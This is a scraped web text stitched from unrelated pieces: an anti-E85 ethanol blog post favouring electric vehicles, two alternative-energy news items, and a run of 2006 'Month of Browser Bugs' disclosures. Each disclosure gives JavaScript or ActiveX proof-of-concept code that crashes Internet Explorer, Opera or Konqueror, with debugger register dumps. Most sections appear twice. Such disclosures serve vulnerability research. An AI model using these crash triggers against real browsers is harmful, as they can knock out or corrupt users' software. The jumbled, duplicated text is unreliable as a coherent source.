Car and Driver Magazine on the Promise of Energy Independence through Ethanol
USA Today on the Ethanol Debate
Cutting Down Borneo's Rainforests to Make BioFuels
Is Ethanol / E85 Fuel the Solution?
I've recently received a number of emails calling for me to Kick the Oil Habit by supporting E85 which is a liquid fuel made up of 85% ethanol and 15% regular gasoline. Having previously had my doubts about ethanol I emailed fellow blogger the Engineer Poet seeking his opinion. A large part of this resulting post is based directly on his reply and as such the credit belongs to him.
So is E85 fuel the answer to America's (and the world's) addiction to oil?
E85 fuel is not the solution. It is not even a part of the solution, it is a part of the problem. Here's why, in a nutshell:
All US vehicles can burn 10% ethanol (E10), but the US does not even produce half as much ethanol as universal E10 would require. We make about 5 billion gallons of ethanol, but use 140 billion gallons of gas.
E85 and "flex fuel" is a loophole for the automakers to sell guzzlers without having to pay CAFE penalties. It makes the problem worse. Ending the loophole probably means ending E85, because there is no other reason for it to exist.
Since the best estimate is that every gallon-equivalent of ethanol takes about 4/5 of a gallon-equivalent of other fossil fuel to make it, each gallon of E85 really represents about 0.6 gallons-equivalent of various fossil fuels. Since most flex-fuel vehicles get roughly 2/3 the mileage on E85 as they do on gasoline, they burn about 90% as much fossil energy even at their best.
Even if we can use "cellulosic ethanol" to reduce the inputs of fossil-derived fertilizer and whatnot, we can't make enough no matter what we do. The efficiency of the average gasoline-powered vehicle is about 15%, and we just can't grow enough inputs to make up for throwing 85% of our produced energy away. The most efficient use of biomass is in local combined heat and power plants, not as a feedstock for ethanol.
Low corn prices and high oil prices, and a government subsidy of 51 cents per gallon have fuelled unprecedented growth of the ethanol industry. In the case of the U.S. ethanol industry, fossil fueled trucks ship the fuel halfway across the country from the population sparse corn belt to population and car dense states like California and Texas. Science magazine found only a 13% reduction in CO2 emissions for bioethanol over gasoline (and only 11% for E85 fuel). U.S. government federal records show a single ADM corn processing plant in Clinton, Iowa generated nearly 20,000 tons of pollutants including sulfur dioxide, nitrogen oxides, and volatile organic compounds in 2004. The EPA considers an ethanol plant as a "major source" of pollution if it produces more than 100 tons of any one pollutant per year. From an emissions standpoint it is far preferable to drive a fuel efficient gasoline car than a low efficiency flex fuel vehicle running on E85.
E85 fuel is not a solution. It is a distraction, like hydrogen vehicles. Further, every E85 vehicle is also a gasoline-compatible vehicle. It will maintain demand for petroleum as long as it is on the road. If you want to end oil addiction you have to get rid of the things which use it.
E85 ethanol fuel may make a small contribution now, but it is a dead end. If we want to really be free of fossil fuels (including imported oil), we have to re-think things as completely as changing from riding horses to driving motor cars.
Ethanol has already created an addiction of its own. The farmers and agribusiness interests which got into it found it hugely profitable, and they have big investments in its continuation. Even if you developed a better way of using corn today, you'd still have a lot of money lobbying to use it for ethanol, and even force it to be used for ethanol.
This is already a race between technologies which can make us independent of fossil fuel, and technologies which get subsidy money. In that race, the subsidy seems to win every time. At least 43 percent of Archer Daniels Midland's annual profits are from products heavily subsidized or protected by the American government. For every $1 of profit earned by ADM's ethanol operation (the largest in the U.S.), it costs taxpayers $30. If you subsidize a technology which can only replace half our gasoline (and none of our diesel, jet fuel, or anything else), you're probably going to be stuck with it.
A hobbyist wrote an article about his home-built plug-in hybrid electric vehicle (PHEV). He published this article in Mother Earth News... in 1978.
We don't need any new technology. We could be building these cars today. Heck, we could have been building them in 1995 (when the CARB ZEV mandate came in)... or maybe even 1985. They would have been crude, but they would have gotten the job done. We can do far better today, of course.
People finally got fed up and started building their own PHEV's out of Toyota Priuses. It's time to quit the excuses, both making them and accepting them.
CAFE regulations utterly failed to contain U.S. motor-fuel consumption. This is not opinion, this is historical fact. Now the E85 fuel campagin wants to do the same thing again, but "reduce" consumption with E85 instead of directly cutting gallons-per-mile. You'll get the same result as before - if driving doesn't cost more, people will continue to drive as much or more.
There are roughly 200 million light-duty vehicles in the USA. One recent news item says that there will be all of 6 million flex-fuel vehicles by 2007. That's a whole 3%.
The average flex-fuel vehicle is a guzzling truck (because they get the biggest CAFE preference from it). If those trucks get 13 MPG on E85, and they drive the national average of 13,000 miles/year, those 6 million vehicles would consume 5.1 billion gallons of ethanol. That's roughly the same as the total production capacity of the nation.
The E85 fuel campaign is currently sponsoring a road trip to highlight the usage of E85, but also the difficulty of driving a car solely on E85 due to its lack of availability.
the electric Tesla Roadster - 250 mile range, one cent a mile, 0-60 in 4 seconds, 130 mph top speed - photo from Autoblog Green
However, had this trip been made in a Tesla Roadster or tZero from AC Propulsion, it could have instead highlighted how EASY it is to get electricity wherever you are... even if you never stop at a filling station! Using non-toxic lithium-ion batteries they have a 250 mile range, charging overnight from an electric outlet.
E85 fuel is a distraction, a diversion, a red herring. Just as the switch to "hydrogen economy" (remember that?) was before it. Both require huge investment, new infrastructure and will not lead to a post-oil economy. The hydrogen economy was promoted principally by both automakers and oil companies as a stalling strategy to avoid having to change the way they currently do business. Oil companies were also aware in the unlikely event that the hydrogen economy did take off (with huge taxpayer subsidies) that they would be supplying hydrogen produced from natural gas which they were already profitting from. The automakers sat around lamenting the fact they couldn’t start to build cars as there are hardly any hydrogen filling stations and the energy companies would not open commercial hydrogen filling stations as there is no demand for them. While appearing to want to do something, both the automakers and energy companies continued for a few more years with business as usual.
The Nissan Armada promoted on the E85 fuel site - with no fuel economy figures indicated
The campaign for E85 fuel is somewhat similar. The automakers are eager to produce flex fuel vehicles which require a relatively cheap modification to the highly profitable gas guzzling SUVs they already produce. By backing E85 fuel they can continue to produce the highly inefficient vehicles while appearing to be green (as seen in GM's Live Green Go Yellow campaign). Car and Driver magazine estimates the CAFE loophole could have saved GM more than $200 million in fines in 2005 alone.
As GM admits the consumer can choose “to operate on gasoline or on a blend of 85% ethanol and 15% gasoline. So, you can choose the fuel that's best for you. That's good to know, because E85 fuel is not yet widely available.” In other words in the vast majority of cases your new flex fuel vehicle will still be running on regular gas. Charter members of the National Ethanol Vehicle Coalition (NEVC), which promotes E85 fuel, when it was set up in June 2000 include GM, DaimlerChrsyler, and Ford.
Meanwhile E85 fuel is also been promoted by organisations such as the National Corn Growers Association, as well as regional and state corn growers organisations, associated agribusinesses and biofuel companies. All of which have a commercial interest in promoting E85 fuel. According to the Center for Responsive Politics, a clearinghouse on political donations, the agribusiness sector has funneled more than $190 million into federal election campaigns since the 2000 election cycle. In the NEVC’s bylaws its purpose is described as to "ensure that as decisions regarding the future of America’s use of alternative forms of transportation fuels are being made, ethanol has a role in the nation’s alternative transportation fuel market and support the expanded use of ethanol" and to "advance legislative proposals" to this effect. This seems to be regardless of whether ethanol/ E85 fuel is the best or is even a good solution to our energy challenges.
As the Engineer Poet points out in this post, burning fuel for transportation is very inefficient way of using energy. Whether you are fed up with the current use of petroleum for transportation for environmental, political or financial reasons E85 fuel is simply not the answer. What we need is a step change, as represented by moving from using gas burning vehicles to electric vehicles.
To encourage this, I urge you to sign this online plug in hybrid campaign asking automakers to produce plug-in hybrid electric vehicles (PHEVs).
Autoblog Green's exclusive interview with Tesla Motors' chairman
Tesla Roadster Video
Archer Daniels Midland (ADM) - the Largest U.S. Ethanol Producer
Vinod Khosla Debunked
Car and Driver Magazine on the Promise of Energy Independence through Ethanol
USA Today on the Ethanol Debate
Cutting Down Borneo's Rainforests to Make BioFuels
MoBB #26: Opera CSS Background
The following bug was tested on the latest version of Opera 9 on a fully-patched Windows XP SP2 system. A memory corruption issue can be triggered by setting the background property of any DHTML element to a long HTTPS URL.
var a = document.createElement('a');
var b = 'XXXX';
while (b.length <= 1024*1024) b+=b;
a.style.background = 'url(https://' + b + ')';
Demonstration
eax=0c4f0020 ebx=00000000 ecx=0c4f0020
edx=0a4b0030 esi=00953ff8 edi=00200008
eip=67befb98 esp=0012e38c ebp=0012e404
Opera_679e0000+0x20fb98:
67befb98 668b32 mov si,[edx] ds:0023:0a4b0030=0000
This bug will be added to the OSVDB:
Opera CSS Background Property HTTPS Memory Corruption
var a = document.createElement('a');
var b = 'XXXX';
while (b.length <= 1024*1024) b+=b;
a.style.background = 'url(https://' + b + ')';
Demonstration
eax=0c4f0020 ebx=00000000 ecx=0c4f0020
edx=0a4b0030 esi=00953ff8 edi=00200008
eip=67befb98 esp=0012e38c ebp=0012e404
Opera_679e0000+0x20fb98:
67befb98 668b32 mov si,[edx] ds:0023:0a4b0030=0000
This bug will be added to the OSVDB:
Opera CSS Background Property HTTPS Memory Corruption
Tuesday, July 25, 2006
MoBB #25: Native Function Iterator
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. A NULL reference can be triggered by using javascript to iterate over a native function.
for (var i in window.alert) { var a = 1; }
Demonstration
eax=00000000 ebx=ffffffff ecx=0013b3f0
edx=0013b3f0 esi=00000000 edi=0013b488
eip=7dceef12 esp=0013b3d0 ebp=0013b3d4
mshtml!CPtrBagVTableAggregate::CIterator::Start+0x1e:
7dceef12 ff36 push dword ptr [esi] ds:0023:00000000=?????
This bug will be added to the OSVDB:
Microsoft IE Native Function Iteration NULL Dereference
for (var i in window.alert) { var a = 1; }
Demonstration
eax=00000000 ebx=ffffffff ecx=0013b3f0
edx=0013b3f0 esi=00000000 edi=0013b488
eip=7dceef12 esp=0013b3d0 ebp=0013b3d4
mshtml!CPtrBagVTableAggregate::CIterator::Start+0x1e:
7dceef12 ff36 push dword ptr [esi] ds:0023:00000000=?????
This bug will be added to the OSVDB:
Microsoft IE Native Function Iteration NULL Dereference
Sunday, July 23, 2006
MoBB #24: Forms.ListBox.1 ListWidth
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system with the latest version of Office 2003 installed. Setting the ListWidth property of either the Forms.ListBox.1 or Forms.ComboBox.1 objects to 0x7fffffff will result in an integer overflow exception, while setting it to 0x7ffffffe will trigger a NULL dereference.
var a = new ActiveXObject('Forms.ListBox.1');
a.ListWidth = 0x7ffffffe;
Demonstration
eax=00000000 ebx=0013b0d8 ecx=00000001
edx=00000052 esi=0013b084 edi=600b115e
eip=60009115 esp=0013b044 ebp=0013b044
FM20!DllGetClassObject+0x6bd5:
60009115 0fb710 movzx edx,word ptr [eax] ds:0023:00000000=????
This bug will be added to the OSVDB:
Microsoft IE Forms Multiple Object ListWidth Property Integer Overflow
var a = new ActiveXObject('Forms.ListBox.1');
a.ListWidth = 0x7ffffffe;
Demonstration
eax=00000000 ebx=0013b0d8 ecx=00000001
edx=00000052 esi=0013b084 edi=600b115e
eip=60009115 esp=0013b044 ebp=0013b044
FM20!DllGetClassObject+0x6bd5:
60009115 0fb710 movzx edx,word ptr [eax] ds:0023:00000000=????
This bug will be added to the OSVDB:
Microsoft IE Forms Multiple Object ListWidth Property Integer Overflow
MoBB #23: NMSA.ASFSourceMediaDescription dispValue
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. Setting the dispValue property of this object to a long string triggers a stack overflow (not a buffer overflow).
var a = new ActiveXObject('NMSA.ASFSourceMediaDescription.1');
var b = 'XXXX';
while (b.length <= 1024) b += b;
a.dispValue = b;
Demonstration
eax=027221f8 ebx=00000000 ecx=0019d198
edx=00160dae esi=027221f8 edi=00000000
eip=77a22395 esp=00032f78 ebp=00033180
OLEAUT32!CTypeInfo2::VariantVtOfHtype+0x9:
77a22395 56 push esi
This bug will be added to the OSVDB:
Microsoft IE NMSA.ASFSourceMediaDescription dispValue Stack Overflow
var a = new ActiveXObject('NMSA.ASFSourceMediaDescription.1');
var b = 'XXXX';
while (b.length <= 1024) b += b;
a.dispValue = b;
Demonstration
eax=027221f8 ebx=00000000 ecx=0019d198
edx=00160dae esi=027221f8 edi=00000000
eip=77a22395 esp=00032f78 ebp=00033180
OLEAUT32!CTypeInfo2::VariantVtOfHtype+0x9:
77a22395 56 push esi
This bug will be added to the OSVDB:
Microsoft IE NMSA.ASFSourceMediaDescription dispValue Stack Overflow
Friday, July 21, 2006
MoBB #22: Internet.HHCtrl Click
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the Click() method on this object, without first initializing the URL, will trigger a NULL dereference. This bug was submitted by Alex F.
var a = new ActiveXObject("Internet.HHCtrl.1");
a.Click();
Demonstration
eax=00000000 ebx=00000000 ecx=00000000
edx=00000000 esi=0237bb68 edi=00000000
eip=7db374c0 esp=0013a3d0 ebp=0013a3f0
hhctrl!CHtmlHelpControl::GetCurrentUrl+0x3c:
7db374c0 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE HTML Help COM Object Click Method NULL Dereference
var a = new ActiveXObject("Internet.HHCtrl.1");
a.Click();
Demonstration
eax=00000000 ebx=00000000 ecx=00000000
edx=00000000 esi=0237bb68 edi=00000000
eip=7db374c0 esp=0013a3d0 ebp=0013a3f0
hhctrl!CHtmlHelpControl::GetCurrentUrl+0x3c:
7db374c0 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE HTML Help COM Object Click Method NULL Dereference
Thursday, July 20, 2006
MoBB #21: CEnroll stringToBinary
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the stringToBinary() function with a long string for the second parameter can result in an invalid memory access inside the SysAllocStringLen function. This bug is similar to MoBB #8.
var a = new ActiveXObject('CEnroll.CEnroll.2');
var b = 'BOOM';
while (b.length <= 1024*1024) b+=b;
a.stringToBinary(1, b);
Demonstration
eax=03580024 ebx=00300000 ecx=0005fc08
edx=00300000 esi=03571000 edi=03701004
eip=77124ba4 esp=0013b200 ebp=0013b20c
OLEAUT32!SysAllocStringLen+0x4f:
77124ba4 f3a5 rep movsd ds:03571000=???????? es:03701004=00000000
This bug will be added to the OSVDB:
Microsoft IE CEnroll SysAllocStringLen Invalid Length
var a = new ActiveXObject('CEnroll.CEnroll.2');
var b = 'BOOM';
while (b.length <= 1024*1024) b+=b;
a.stringToBinary(1, b);
Demonstration
eax=03580024 ebx=00300000 ecx=0005fc08
edx=00300000 esi=03571000 edi=03701004
eip=77124ba4 esp=0013b200 ebp=0013b20c
OLEAUT32!SysAllocStringLen+0x4f:
77124ba4 f3a5 rep movsd ds:03571000=???????? es:03701004=00000000
This bug will be added to the OSVDB:
Microsoft IE CEnroll SysAllocStringLen Invalid Length
Wednesday, July 19, 2006
MoBB #20: OVCtl NewDefaultItem
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Outlook to be installed. Calling the NewDefaultItem() method triggers a NULL dereference. This bug was submitted by Alfredo Melloni.
var a = new ActiveXObject('OVCtl.OVCtl.1');
a.NewDefaultItem();
Demonstration
eax=00000000 ebx=00000800 ecx=0013b234
edx=0013b200 esi=00000000 edi=357a3b58
eip=357b07e3 esp=0013b1c4 ebp=0013b240
OUTLCTL!DllUnregisterServer+0x3678:
357b07e3 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE OVCtl NewDefaultItem Method NULL Dereference
var a = new ActiveXObject('OVCtl.OVCtl.1');
a.NewDefaultItem();
Demonstration
eax=00000000 ebx=00000800 ecx=0013b234
edx=0013b200 esi=00000000 edi=357a3b58
eip=357b07e3 esp=0013b1c4 ebp=0013b240
OUTLCTL!DllUnregisterServer+0x3678:
357b07e3 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE OVCtl NewDefaultItem Method NULL Dereference
MoBB #19: DataSourceControl getDataMemberName
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Office 2003 to be installed (older versions of this control have not been tested). Calling the getDataMemberName() method with a negative large integer value results in an integer overflow and a NULL dereference.
var a = new ActiveXObject('OWC11.DataSourceControl.11');
a.getDataMemberName(-0x80000000);
Demonstration
eax=0000001c ebx=025d15a8 ecx=0000001c
edx=387d0e24 esi=0013b234 edi=0013b204
eip=3878cfac esp=0013b1fc ebp=0013b228
OWC11!DllGetClassObject+0x5a3e4:
3878cfac 8b01 mov eax,[ecx] ds:0023:0000001c=????????
This bug will be added to the OSVDB:
Microsoft IE OWC11.DataSourceControl getDataMemberName Method Integer Overflow
var a = new ActiveXObject('OWC11.DataSourceControl.11');
a.getDataMemberName(-0x80000000);
Demonstration
eax=0000001c ebx=025d15a8 ecx=0000001c
edx=387d0e24 esi=0013b234 edi=0013b204
eip=3878cfac esp=0013b1fc ebp=0013b228
OWC11!DllGetClassObject+0x5a3e4:
3878cfac 8b01 mov eax,[ecx] ds:0023:0000001c=????????
This bug will be added to the OSVDB:
Microsoft IE OWC11.DataSourceControl getDataMemberName Method Integer Overflow
Tuesday, July 18, 2006
MoBB #18: WebViewFolderIcon setSlice
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the setSlice() method with the first argument set to 0x7fffffff triggers an invalid memory copy.
var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);
Demonstration
eax=00000010 ebx=001e4940 ecx=00000004
edx=7c97c0d8 esi=0013b188 edi=fffffff0
eip=773e0ba3 esp=0013b14c ebp=0013b158
comctl32!DSA_SetItem+0x60:
773e0ba3 f3a5 rep movsd ds:0013b188=41424344 es:fffffff0=????????
This bug will be added to the OSVDB:
Microsoft IE WebViewFolderIcon setSlice Integer Overflow
var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);
Demonstration
eax=00000010 ebx=001e4940 ecx=00000004
edx=7c97c0d8 esi=0013b188 edi=fffffff0
eip=773e0ba3 esp=0013b14c ebp=0013b158
comctl32!DSA_SetItem+0x60:
773e0ba3 f3a5 rep movsd ds:0013b188=41424344 es:fffffff0=????????
This bug will be added to the OSVDB:
Microsoft IE WebViewFolderIcon setSlice Integer Overflow
Monday, July 17, 2006
Why Alternative Energy?
A poll carried carried out for the BBC World Service of nearly 20,000 people from across 19 countries found wide support for alternative energy strategies.
The poll illustrates a perceived triple threat from the way the world produces and uses energy.
Majorities across all 19 countries indicate that citizens fear:
the climate and environment are being harmed
that the global economy will be destabilised
that competition for energy will lead to greater conflict
Some eight out of 10 of those questioned were worried about the threat to the environment. In Australia, Great Britain, Canada and Italy the level of concern topped 90%.
Doug Miller, president of the poll firm GlobeScan, said: "What's fascinating is that in the midst of historically high energy prices and geopolitical tensions, the number one energy concern in every industrialised country we surveyed is the environmental and climate impacts."
Creating tax incentives to encourage the use of alternative energy sources such as wind and solar power found favour with 80% of respondents.
But there was lukewarm support for more nuclear energy to reduce reliance on fossil fuels. On average, 49% were in favour of building more nuclear plants.
Majorities of 60% or more in 18 of the 19 countries polled said they feared energy shortages and prices would destabilise the world economy.
The least concerned was Russia, a major oil and gas producer, which benefits from higher prices.
Both US and EU leaders have warned Russia not to use energy as a tool of foreign policy. Earlier this year, the nation's monopoly, Gazprom, cut off gas supplies to Europe during a price dispute with Ukraine.
Some 73% of those questioned were worried that energy shortages would lead to greater conflict among nations.
In total, 19,579 citizens were interviewed in Australia, Brazil, Canada, Chile, Egypt, France, Germany, Great Britain, India, Israel, Italy, Kenya, Mexico, Philippines, Poland, Russia, South Korea, Ukraine and the US.
Polling was conducted for the BBC World Service by polling firm GlobeScan and its research partners.
Full Article on BBC News
Why Alternative Energy?
A poll carried carried out for the BBC World Service of nearly 20,000 people from across 19 countries found wide support for alternative energy strategies.
The poll illustrates a perceived triple threat from the way the world produces and uses energy.
Majorities across all 19 countries indicate that citizens fear:
the climate and environment are being harmed
that the global economy will be destabilised
that competition for energy will lead to greater conflict
Some eight out of 10 of those questioned were worried about the threat to the environment. In Australia, Great Britain, Canada and Italy the level of concern topped 90%.
Doug Miller, president of the poll firm GlobeScan, said: "What's fascinating is that in the midst of historically high energy prices and geopolitical tensions, the number one energy concern in every industrialised country we surveyed is the environmental and climate impacts."
Creating tax incentives to encourage the use of alternative energy sources such as wind and solar power found favour with 80% of respondents.
But there was lukewarm support for more nuclear energy to reduce reliance on fossil fuels. On average, 49% were in favour of building more nuclear plants.
Majorities of 60% or more in 18 of the 19 countries polled said they feared energy shortages and prices would destabilise the world economy.
The least concerned was Russia, a major oil and gas producer, which benefits from higher prices.
Both US and EU leaders have warned Russia not to use energy as a tool of foreign policy. Earlier this year, the nation's monopoly, Gazprom, cut off gas supplies to Europe during a price dispute with Ukraine.
Some 73% of those questioned were worried that energy shortages would lead to greater conflict among nations.
In total, 19,579 citizens were interviewed in Australia, Brazil, Canada, Chile, Egypt, France, Germany, Great Britain, India, Israel, Italy, Kenya, Mexico, Philippines, Poland, Russia, South Korea, Ukraine and the US.
Polling was conducted for the BBC World Service by polling firm GlobeScan and its research partners.
Full Article on BBC News
$4b Investment in Wind Power by BP Alternative Energy
BP is making its first major investment in wind power with a joint venture that will lead to a major expansion of its generating capacity.
The oil company announced it had entered a five-year supply and development agreement involving five wind power projects in the US with Clipper Windpower.
The news sent Clipper shares up 80p, or 28 per cent, to 362.5p in London. The projects, with an anticipated total generating capacity of 2,015 megawatts, are situated in New York, Texas and South Dakota.
BP has also secured a mix of firm and contingent orders of up to 2,250 megawatts of additional Clipper wind turbines in its global wind energy portfolio, the companies said.
BP launched BP Alternative Energy to focus on solar, hydrogen and wind power but its wind operation has up to now been confined to two projects with a combined output of only 31 megawatts.
Steve Westwell, the chief executive of BP Alternative Energy, said: "We believe the Clipper turbine is a breakthrough in reducing the total cost of renewable energy and we are pleased to be the first large customers for this innovative technology."
This is thought to be the biggest single investment in wind power estimated at $4 billion US dollars.
The announcement, came in the same week that the British government published its energy review and a telephone poll found that 79% of respondents thought solar power and 76% wind power were the best investments in electricity generation for the UK.
$4b Investment in Wind Power by BP Alternative Energy
BP is making its first major investment in wind power with a joint venture that will lead to a major expansion of its generating capacity.
The oil company announced it had entered a five-year supply and development agreement involving five wind power projects in the US with Clipper Windpower.
The news sent Clipper shares up 80p, or 28 per cent, to 362.5p in London. The projects, with an anticipated total generating capacity of 2,015 megawatts, are situated in New York, Texas and South Dakota.
BP has also secured a mix of firm and contingent orders of up to 2,250 megawatts of additional Clipper wind turbines in its global wind energy portfolio, the companies said.
BP launched BP Alternative Energy to focus on solar, hydrogen and wind power but its wind operation has up to now been confined to two projects with a combined output of only 31 megawatts.
Steve Westwell, the chief executive of BP Alternative Energy, said: "We believe the Clipper turbine is a breakthrough in reducing the total cost of renewable energy and we are pleased to be the first large customers for this innovative technology."
This is thought to be the biggest single investment in wind power estimated at $4 billion US dollars.
The announcement, came in the same week that the British government published its energy review and a telephone poll found that 79% of respondents thought solar power and 76% wind power were the best investments in electricity generation for the UK.
Sunday, July 16, 2006
MoBB #17: Gradient StartColorStr
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the StartColorStr or EndColorStr properties to a large value leads to a stack overflow exception (not a buffer overflow).
var a = new ActiveXObject('DXImageTransform.Microsoft.Gradient.1');
var b = 'XXXX';
while (b.length <= (1024*1024)) b += b;
a.StartColorStr = b;
Demonstration
eax=00007004 ebx=00100001 ecx=0004215c
edx=0013b1ac esi=03b00024 edi=00000000
eip=6be11a16 esp=0013b154 ebp=0013b190
dxtmsft!_chkstk+0x25:
6be11a16 8501 test [ecx],eax ds:0023:0004215c=00000000
This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.Gradient Multiple Property Stack Overflow
var a = new ActiveXObject('DXImageTransform.Microsoft.Gradient.1');
var b = 'XXXX';
while (b.length <= (1024*1024)) b += b;
a.StartColorStr = b;
Demonstration
eax=00007004 ebx=00100001 ecx=0004215c
edx=0013b1ac esi=03b00024 edi=00000000
eip=6be11a16 esp=0013b154 ebp=0013b190
dxtmsft!_chkstk+0x25:
6be11a16 8501 test [ecx],eax ds:0023:0004215c=00000000
This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.Gradient Multiple Property Stack Overflow
MoBB #16: MHTMLFile Location
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the location or URL property triggers a NULL dereference. Thanks to 'sniper' for the submission.
var a = new ActiveXObject('mhtmlfile');
a.location = "http://browserfun.blogspot.com";
Demonstration
eax=00000000 ebx=00000001 ecx=0000ae80
edx=0020540c esi=019c2420 edi=00000000
eip=7dcd113e esp=00139048 ebp=0013b074
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??
This bug will be added to the OSVDB:
Microsoft IE MHTMLFile Multiple Property NULL Dereference
var a = new ActiveXObject('mhtmlfile');
a.location = "http://browserfun.blogspot.com";
Demonstration
eax=00000000 ebx=00000001 ecx=0000ae80
edx=0020540c esi=019c2420 edi=00000000
eip=7dcd113e esp=00139048 ebp=0013b074
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??
This bug will be added to the OSVDB:
Microsoft IE MHTMLFile Multiple Property NULL Dereference
Friday, July 14, 2006
MoBB #15: FolderItem Access
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Accessing the object reference of this control triggers a NULL dereference in the security check :-)
<object id="target" classid="clsid:FEF10FA2-355E-4e06-9381-9B24D7F7CC88">
</object>
var a = document.getElementById('target');
alert(a.object);
Demonstration
eax=0000eb6c ebx=00000000 ecx=00000000
edx=09105b62 esi=0013b1ac edi=03cec120
eip=7cb86ce4 esp=0013aee4 ebp=0013b184
SHELL32!CFolder::_SecurityCheck:
7cb86ce4 83790c00 cmp dword ptr [ecx+0xc],0x0 ds:0023:0000000c=????????
This bug will be added to the OSVDB:
Microsoft IE FolderItem Object NULL Dereference
<object id="target" classid="clsid:FEF10FA2-355E-4e06-9381-9B24D7F7CC88">
</object>
var a = document.getElementById('target');
alert(a.object);
Demonstration
eax=0000eb6c ebx=00000000 ecx=00000000
edx=09105b62 esi=0013b1ac edi=03cec120
eip=7cb86ce4 esp=0013aee4 ebp=0013b184
SHELL32!CFolder::_SecurityCheck:
7cb86ce4 83790c00 cmp dword ptr [ecx+0xc],0x0 ds:0023:0000000c=????????
This bug will be added to the OSVDB:
Microsoft IE FolderItem Object NULL Dereference
MoBB #14: Konqueror replaceChild()
The following bug was tested on KDE 3.5.1 on a current Gentoo Linux system. Calling the replaceChild() method on almost any DOM element can result in a NULL dereference.
document.replaceChild(0);
Demonstration
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1231504512 (LWP 11418)]
0xb6552ca0 in DOM::Node::replaceChild () from /usr/kde/3.5/lib/libkhtml.so.4
(gdb) display /i $pc
1: x/i $pc 0xb6552ca0 <_ZN3DOM4Node12replaceChildERKS0_S2_+110>: testb $0x8,0x22(%edx)
(gdb) i r $edx
edx 0x0 0
This bug will be added to the OSVDB:
KDE Konqueror replaceChild() NULL Dereference
document.replaceChild(0);
Demonstration
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1231504512 (LWP 11418)]
0xb6552ca0 in DOM::Node::replaceChild () from /usr/kde/3.5/lib/libkhtml.so.4
(gdb) display /i $pc
1: x/i $pc 0xb6552ca0 <_ZN3DOM4Node12replaceChildERKS0_S2_+110>: testb $0x8,0x22(%edx)
(gdb) i r $edx
edx 0x0 0
This bug will be added to the OSVDB:
KDE Konqueror replaceChild() NULL Dereference
Wednesday, July 12, 2006
MoBB #13: RevealTrans Transition
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the Transition property of this object triggers a NULL dereference.
var a = new ActiveXObject('DXImageTransform.Microsoft.RevealTrans.1');
a.Transition = 1;
Demonstration
eax=00000000 ebx=00000000 ecx=35cde0c4
edx=00174972 esi=02d701d8 edi=00000001
eip=35cde0fe esp=0012b240 ebp=0012b25c
dxtmsft!CDXTRevealTrans::put_Transition+0x3a:
35cde0fe 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference
var a = new ActiveXObject('DXImageTransform.Microsoft.RevealTrans.1');
a.Transition = 1;
Demonstration
eax=00000000 ebx=00000000 ecx=35cde0c4
edx=00174972 esi=02d701d8 edi=00000001
eip=35cde0fe esp=0012b240 ebp=0012b25c
dxtmsft!CDXTRevealTrans::put_Transition+0x3a:
35cde0fe 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference
Tuesday, July 11, 2006
MoBB #12: TriEditDocument URL
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the URL property of this object triggers a NULL dereference.
var a = new ActiveXObject('TriEditDocument.TriEditDocument');
a.URL = "Boom!";
Demonstration
eax=00000000 ebx=00000001 ecx=000076b6
edx=018f486c esi=018f3c10 edi=00000000
eip=7dcd113e esp=00137034 ebp=00139060
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??
This bug will be added to the OSVDB:
Microsoft IE TriEditDocument URL Property NULL Dereference
var a = new ActiveXObject('TriEditDocument.TriEditDocument');
a.URL = "Boom!";
Demonstration
eax=00000000 ebx=00000001 ecx=000076b6
edx=018f486c esi=018f3c10 edi=00000000
eip=7dcd113e esp=00137034 ebp=00139060
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??
This bug will be added to the OSVDB:
Microsoft IE TriEditDocument URL Property NULL Dereference
Iraq Natural History References and Iraq Fauna Wiki
